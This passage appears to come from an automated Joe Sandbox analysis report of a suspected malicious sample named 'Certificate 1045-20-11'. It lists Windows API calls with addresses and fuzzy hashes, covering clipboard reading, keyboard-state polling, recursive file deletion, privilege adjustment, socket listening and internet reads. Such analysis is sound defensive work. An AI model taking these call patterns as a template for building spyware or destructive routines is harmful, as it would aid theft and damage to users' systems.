                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 1917200108-1173974218
                                                                                APIs
                                                                                • OpenClipboard.USER32(008DDC00), ref: 00896B36
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00896B44
                                                                                • GetClipboardData.USER32(0000000D), ref: 00896B4C
                                                                                • CloseClipboard.USER32 ref: 00896B58
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00896B74
                                                                                • CloseClipboard.USER32 ref: 00896B7E
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00896B93
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00896BA0
                                                                                • GetClipboardData.USER32(00000001), ref: 00896BA8
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00896BB5
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00896BE9
                                                                                • CloseClipboard.USER32 ref: 00896CF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                • String ID:
                                                                                • API String ID: 3222323430-0
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0088F62B
                                                                                • FindClose.KERNEL32(00000000), ref: 0088F67F
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088F6A4
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088F6BB
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088F6E2
                                                                                • __swprintf.LIBCMT ref: 0088F72E
                                                                                • __swprintf.LIBCMT ref: 0088F767
                                                                                • __swprintf.LIBCMT ref: 0088F7BB
                                                                                  • Part of subcall function 0086172B: __woutput_l.LIBCMT ref: 00861784
                                                                                • __swprintf.LIBCMT ref: 0088F809
                                                                                • __swprintf.LIBCMT ref: 0088F858
                                                                                • __swprintf.LIBCMT ref: 0088F8A7
                                                                                • __swprintf.LIBCMT ref: 0088F8F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                • API String ID: 835046349-2428617273
                                                                                • Opcode ID: 9dc95460c03782f10d04bb873a22ae0a9d6f0cddb703b9a711242365985de520
                                                                                • Instruction ID: ef4f368e44fd58b09bf81252943bb0423351bc23eebc0a668481c1135340b1eb
                                                                                • Opcode Fuzzy Hash: 9dc95460c03782f10d04bb873a22ae0a9d6f0cddb703b9a711242365985de520
                                                                                • Instruction Fuzzy Hash: 15A10F72404344ABC750EBA8C885DAFB7ECFF98704F44492AF695C2152EB34E949C763
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00891B50
                                                                                • _wcscmp.LIBCMT ref: 00891B65
                                                                                • _wcscmp.LIBCMT ref: 00891B7C
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00891B8E
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00891BA8
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00891BC0
                                                                                • FindClose.KERNEL32(00000000), ref: 00891BCB
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00891BE7
                                                                                • _wcscmp.LIBCMT ref: 00891C0E
                                                                                • _wcscmp.LIBCMT ref: 00891C25
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00891C37
                                                                                • SetCurrentDirectoryW.KERNEL32(008F39FC), ref: 00891C55
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00891C5F
                                                                                • FindClose.KERNEL32(00000000), ref: 00891C6C
                                                                                • FindClose.KERNEL32(00000000), ref: 00891C7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1803514871-438819550
                                                                                • Opcode ID: 6765ae2d261053c3a5c49297916908304f06fc0dea51050b8cc7a828d5045a63
                                                                                • Instruction ID: 50e6af24ad7d6e816c4e7861d79b21face359feff4fb12a15ad0e73ea4698cd2
                                                                                • Opcode Fuzzy Hash: 6765ae2d261053c3a5c49297916908304f06fc0dea51050b8cc7a828d5045a63
                                                                                • Instruction Fuzzy Hash: 4D31C33264431A6EDF10BBB4EC4DEEEB7ACFF05324F184166E911D3190EB74DA458A64
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00891CAB
                                                                                • _wcscmp.LIBCMT ref: 00891CC0
                                                                                • _wcscmp.LIBCMT ref: 00891CD7
                                                                                  • Part of subcall function 00886BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00886BEF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00891D06
                                                                                • FindClose.KERNEL32(00000000), ref: 00891D11
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00891D2D
                                                                                • _wcscmp.LIBCMT ref: 00891D54
                                                                                • _wcscmp.LIBCMT ref: 00891D6B
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00891D7D
                                                                                • SetCurrentDirectoryW.KERNEL32(008F39FC), ref: 00891D9B
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00891DA5
                                                                                • FindClose.KERNEL32(00000000), ref: 00891DB2
                                                                                • FindClose.KERNEL32(00000000), ref: 00891DC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 1824444939-438819550
                                                                                • Opcode ID: 2f76585ab86c973e2e570b76c9c542a1020fa76650e3c456b4ca9e5d8c78c3a9
                                                                                • Instruction ID: 5c0aaaf9ee01b7d2c0d31b894e4b130021348ee6620b82e75d5c811c8a8ca931
                                                                                • Opcode Fuzzy Hash: 2f76585ab86c973e2e570b76c9c542a1020fa76650e3c456b4ca9e5d8c78c3a9
                                                                                • Instruction Fuzzy Hash: 3931D23260461A6ADF10FBB4EC0DEEEB7ACFF45324F180566E811E2191DB74DA458A64
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                • API String ID: 2102423945-2023335898
                                                                                • Opcode ID: 0afbab006970e2358dfa3ab5163b723e39359690e0cb2c75618dd1db85e1a078
                                                                                • Instruction ID: b9773ef8cec1ad75d4b4b822f5617581a6add8f9c5887f3dcb5e60bd6e0b03b0
                                                                                • Opcode Fuzzy Hash: 0afbab006970e2358dfa3ab5163b723e39359690e0cb2c75618dd1db85e1a078
                                                                                • Instruction Fuzzy Hash: E4825971D0421DDBCB24CF98C8806ADBBB1FF48314F25816AD959EB351E774AE85CB90
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 008909DF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 008909EF
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008909FB
                                                                                • __wsplitpath.LIBCMT ref: 00890A59
                                                                                • _wcscat.LIBCMT ref: 00890A71
                                                                                • _wcscat.LIBCMT ref: 00890A83
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00890A98
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890AAC
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890ADE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890AFF
                                                                                • _wcscpy.LIBCMT ref: 00890B0B
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00890B4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 3566783562-438819550
                                                                                • Opcode ID: 275ea1ad7e01de046290e4e5d4f5750cdf73a5c4751d181f086bd4b874737a41
                                                                                • Instruction ID: 307bc41ec5b89a9bfab605408b03191847afe1161498e831589e8d9410372101
                                                                                • Opcode Fuzzy Hash: 275ea1ad7e01de046290e4e5d4f5750cdf73a5c4751d181f086bd4b874737a41
                                                                                • Instruction Fuzzy Hash: 716139725043059FDB10EF64C84599EB3E8FF89314F08892AF989C7252EB35EA45CF92
                                                                                APIs
                                                                                  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0087ABD7
                                                                                  • Part of subcall function 0087ABBB: GetLastError.KERNEL32(?,0087A69F,?,?,?), ref: 0087ABE1
                                                                                  • Part of subcall function 0087ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0087A69F,?,?,?), ref: 0087ABF0
                                                                                  • Part of subcall function 0087ABBB: HeapAlloc.KERNEL32(00000000,?,0087A69F,?,?,?), ref: 0087ABF7
                                                                                  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0087AC0E
                                                                                  • Part of subcall function 0087AC56: GetProcessHeap.KERNEL32(00000008,0087A6B5,00000000,00000000,?,0087A6B5,?), ref: 0087AC62
                                                                                  • Part of subcall function 0087AC56: HeapAlloc.KERNEL32(00000000,?,0087A6B5,?), ref: 0087AC69
                                                                                  • Part of subcall function 0087AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0087A6B5,?), ref: 0087AC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0087A6D0
                                                                                • _memset.LIBCMT ref: 0087A6E5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0087A704
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0087A715
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0087A752
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0087A76E
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0087A78B
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0087A79A
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0087A7A1
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0087A7C2
                                                                                • CopySid.ADVAPI32(00000000), ref: 0087A7C9
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0087A7FA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0087A820
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0087A834
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: e7dcfd3f877f624efbe3e897dd639e3a2d974cbd5f444ea2f5a63f51b019e0c1
                                                                                • Instruction ID: df595daf5921406b87ef2aab6959e8bcfdd20e9161f4291921afa6b1ad66009c
                                                                                • Opcode Fuzzy Hash: e7dcfd3f877f624efbe3e897dd639e3a2d974cbd5f444ea2f5a63f51b019e0c1
                                                                                • Instruction Fuzzy Hash: 1B513C71900209ABDF19DF95DC44EEEBBB9FF44700F048129F915EA294DB35DA05CB62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                • API String ID: 0-4052911093
                                                                                • Opcode ID: 628dc88f617ea7dc13890811a84e717b7a8eae174be121af7acfde250547cebf
                                                                                • Instruction ID: c14c02aae61a41c87b001cc0db1180b04fc149f025629441657b052a158f1054
                                                                                • Opcode Fuzzy Hash: 628dc88f617ea7dc13890811a84e717b7a8eae174be121af7acfde250547cebf
                                                                                • Instruction Fuzzy Hash: C7725D71E0421DDBDB24CF98C880BBEB7B5FF48314F14816AE905EB281EB749A419B95
                                                                                APIs
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00885FA6,?), ref: 00886ED8
                                                                                  • Part of subcall function 008872CB: GetFileAttributesW.KERNEL32(?,00886019), ref: 008872CC
                                                                                • _wcscat.LIBCMT ref: 00886441
                                                                                • __wsplitpath.LIBCMT ref: 0088645F
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00886474
                                                                                • _wcscpy.LIBCMT ref: 008864A3
                                                                                • _wcscat.LIBCMT ref: 008864B8
                                                                                • _wcscat.LIBCMT ref: 008864CA
                                                                                • DeleteFileW.KERNEL32(?), ref: 008864DA
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 008864EB
                                                                                • FindClose.KERNEL32(00000000), ref: 00886506
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                • String ID: \*.*
                                                                                • API String ID: 2643075503-1173974218
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A328E
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008A332D
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008A33C5
                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 008A3604
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A3611
                                                                                Similarity
                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1240663315-0
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00882B5F
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00882BE0
                                                                                • GetKeyState.USER32(000000A0), ref: 00882BFB
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00882C15
                                                                                • GetKeyState.USER32(000000A1), ref: 00882C2A
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00882C42
                                                                                • GetKeyState.USER32(00000011), ref: 00882C54
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00882C6C
                                                                                • GetKeyState.USER32(00000012), ref: 00882C7E
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00882C96
                                                                                • GetKeyState.USER32(0000005B), ref: 00882CA8
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                APIs
                                                                                  • Part of subcall function 00879ABF: CLSIDFromProgID.OLE32 ref: 00879ADC
                                                                                  • Part of subcall function 00879ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00879AF7
                                                                                  • Part of subcall function 00879ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00879B05
                                                                                  • Part of subcall function 00879ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00879B15
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0089C235
                                                                                • _memset.LIBCMT ref: 0089C242
                                                                                • _memset.LIBCMT ref: 0089C360
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0089C38C
                                                                                • CoTaskMemFree.OLE32(?), ref: 0089C397
                                                                                Strings
                                                                                • NULL Pointer assignment, xrefs: 0089C3E5
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1300414916-2785691316
                                                                                APIs
                                                                                  • Part of subcall function 0087B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087B180
                                                                                  • Part of subcall function 0087B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087B1AD
                                                                                  • Part of subcall function 0087B134: GetLastError.KERNEL32 ref: 0087B1BA
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00887A0F
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-194228
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00898CA8
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898CB7
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00898CD3
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00898CE2
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898CFC
                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00898D10
                                                                                Similarity
                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                • String ID:
                                                                                • API String ID: 1279440585-0
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00886554
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00886564
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00886583
                                                                                • __wsplitpath.LIBCMT ref: 008865A7
                                                                                • _wcscat.LIBCMT ref: 008865BA
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 008865F9
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1605983538-0
                                                                                APIs
                                                                                  • Part of subcall function 0089A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0089A84E
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00899296
                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 008992B9
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0088EB8A
                                                                                • _wcscmp.LIBCMT ref: 0088EBBA
                                                                                • _wcscmp.LIBCMT ref: 0088EBCF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0088EBE0
                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0088EC0E
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
Strings
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0085E014,74DF0AE0,0085DEF1,008DDC38,?,?), ref: 0085E02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0085E03E
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 008813DC
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
• DefDlgProcW.USER32(?,?,?,?,?), ref: 0085B22F
  • Part of subcall function 0085B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0085B5A5
Similarity
• API ID: Proc$LongWindow
• String ID:
• API String ID: 2749884682-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008943BF,00000000), ref: 00894FA6
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00894FD2
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0088E20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0088E267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0088E2B4
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 0085F4EA: std::exception::exception.LIBCMT ref: 0085F51E
  • Part of subcall function 0085F4EA: __CxxThrowException@8.LIBCMT ref: 0085F533
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087B180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087B1AD
• GetLastError.KERNEL32 ref: 0087B1BA
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008866AF
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 008866EC
• CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008866F5
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
